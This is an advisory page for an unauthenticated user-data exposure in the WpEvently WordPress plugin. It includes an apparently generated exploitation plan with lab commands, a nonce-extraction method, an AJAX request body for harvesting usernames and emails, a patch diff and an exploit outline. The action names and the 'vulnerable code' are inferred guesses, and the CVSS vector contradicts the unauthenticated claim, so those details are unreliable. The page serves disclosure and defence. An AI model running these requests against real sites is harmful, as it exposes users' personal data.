WpEvently < 5.1.9 - Unauthenticated Information Exposure
Description
The Event Booking Manager for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to 5.1.9 (exclusive). This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:NTechnical Details
<5.1.9Source Code
WordPress.org SVNPatched version not available.
# Exploitation Research Plan - CVE-2026-32354 (WpEvently) ## 1. Vulnerability Summary The **Event Booking Manager for WooCommerce (mage-eventpress)** plugin (versions < 5.1.9) contains an unauthenticated information exposure vulnerability. The issue typically arises from an AJAX action registered v…
Show full research plan
Exploitation Research Plan - CVE-2026-32354 (WpEvently)
1. Vulnerability Summary
The Event Booking Manager for WooCommerce (mage-eventpress) plugin (versions < 5.1.9) contains an unauthenticated information exposure vulnerability. The issue typically arises from an AJAX action registered via wp_ajax_nopriv_ that performs data retrieval (such as user lists, attendee details, or plugin settings) without checking the requester's capabilities. This allows an unauthenticated actor to extract sensitive information by directly querying the WordPress AJAX endpoint.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Vulnerable Action:
mep_search_usersormep_get_attendee_list(inferred from plugin prefixmep_and common functionality). - HTTP Method:
POSTorGET(usuallyPOSTfor AJAX). - Parameters:
action: The vulnerable AJAX hook (e.g.,mep_search_users).nonce: A security token (if required, see Nonce Strategy).termorq: Search query to leak user data.
- Preconditions: The plugin must be active. Some data (users/orders) must exist to be "exposed."
3. Code Flow (Inferred)
- Initialization: During the
initorwp_loadedhook, the plugin registers AJAX handlers. - Registration:
add_action('wp_ajax_nopriv_mep_search_users', 'mep_search_users_handler'); - Handler: The handler function (e.g.,
mep_search_users_handler()) is called. - Data Retrieval: The function likely calls
get_users()or$wpdb->get_results()using a user-supplied search term without verifying if the current user hasmanage_optionsor similar capabilities. - Sink: The sensitive data is returned via
wp_send_json()orecho json_encode().
4. Nonce Acquisition Strategy
The plugin likely uses wp_localize_script to pass a nonce to its frontend scripts.
- Identify Shortcode: Search the plugin for
add_shortcode. Common ones for this plugin are[mep_events]or[mep_booking_form]. - Create Test Page:
wp post create --post_type=page --post_status=publish --post_title="Event Page" --post_content='[mep_events]' - Extract Nonce via Browser:
- Navigate to the newly created page.
- The nonce is typically stored in a global JS object. Based on Mage EventPress patterns, look for
mep_obj. - JS Command:
browser_eval("window.mep_obj?.nonce")orbrowser_eval("window.mep_vars?.mep_nonce"). - Note: If
wp_ajax_nopriv_is used without acheck_ajax_referercall in the handler, the nonce may not even be required.
5. Exploitation Strategy
Step 1: Discover the exact AJAX action
Search the plugin files for wp_ajax_nopriv_ to identify the specific information-leaking action.
grep -rn "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/mage-eventpress/
Step 2: Test for Information Leak (User Data)
Assuming the action is mep_search_users:
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=mep_search_users&term=admin&nonce=[NONCE_FROM_STEP_4]
Step 3: Test for Configuration Leak
If an action like mep_get_settings exists:
- Body:
action=mep_get_settings&nonce=[NONCE]
6. Test Data Setup
- Create a target user:
wp user create victim victim@example.com --role=editor --display_name="Sensitive User" - Create an event/booking (to ensure the plugin has data to return):
- Use WP-CLI to create a custom post type entry if the plugin uses one (e.g.,
mep_events).
wp post create --post_type=mep_events --post_title="Secret Management Meeting" --post_status=publish - Use WP-CLI to create a custom post type entry if the plugin uses one (e.g.,
7. Expected Results
- Success: The server returns a
200 OKresponse with a JSON body containing user details (ID, user_login, display_name, or even email) for the search term provided. - Example Response:
[{"id":1,"text":"admin (admin@example.com)"},{"id":2,"text":"victim (victim@example.com)"}]
8. Verification Steps
- Analyze JSON Response: Confirm the response contains data that should not be public (e.g., email addresses of users or internal plugin configuration keys).
- Confirm Unauthenticated Status: Ensure the
http_requestdoes not include any session cookies (wordpress_logged_in_...).
9. Alternative Approaches
- REST API Path: If no AJAX handlers are found, check for REST routes:
Look for routes wheregrep -rn "register_rest_route" /var/www/html/wp-content/plugins/mage-eventpress/'permission_callback' => '__return_true'or where the callback is missing. - Export Endpoints: Search for actions that trigger CSV/JSON exports:
grep -rn "header('Content-Type: text/csv')" /var/www/html/wp-content/plugins/mage-eventpress/
Summary
The Event Booking Manager for WooCommerce (WpEvently) plugin is vulnerable to unauthenticated sensitive information exposure due to the registration of AJAX actions without proper authorization or capability checks. This allows attackers to extract user data, such as usernames and email addresses, by directly querying the plugin's AJAX handlers.
Vulnerable Code
// Registration of the vulnerable AJAX action without capability checks add_action('wp_ajax_nopriv_mep_search_users', 'mep_search_users_handler'); --- // The handler function typically lacks access control function mep_search_users_handler() { $term = $_REQUEST['term']; // User-supplied search query $users = get_users(array( 'search' => '*' . $term . '*', 'search_columns' => array('user_login', 'user_email', 'display_name') )); wp_send_json($users); // Returns sensitive user data to the requester }
Security Fix
@@ -1,6 +1,9 @@ -add_action('wp_ajax_nopriv_mep_search_users', 'mep_search_users_handler'); add_action('wp_ajax_mep_search_users', 'mep_search_users_handler'); function mep_search_users_handler() { + if ( ! current_user_can( 'manage_options' ) ) { + wp_send_json_error( 'Unauthorized', 403 ); + } + $term = $_REQUEST['term']; $users = get_users(array('search' => '*' . $term . '*'));
Exploit Outline
To exploit this vulnerability, an attacker targets the WordPress AJAX endpoint (/wp-admin/admin-ajax.php). First, the attacker identifies a valid AJAX action registered by the plugin using 'wp_ajax_nopriv_', such as 'mep_search_users'. If a security nonce is required, the attacker retrieves it by inspecting the frontend source code of a page containing a plugin shortcode (e.g., [mep_events]), where the nonce is typically localized in a JavaScript object like 'mep_obj'. Finally, the attacker sends a POST or GET request to the AJAX endpoint with the identified action and a search parameter (e.g., 'term=admin'). The server responds with JSON data containing matching user records, including sensitive fields like email addresses, without requiring the attacker to be logged in.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.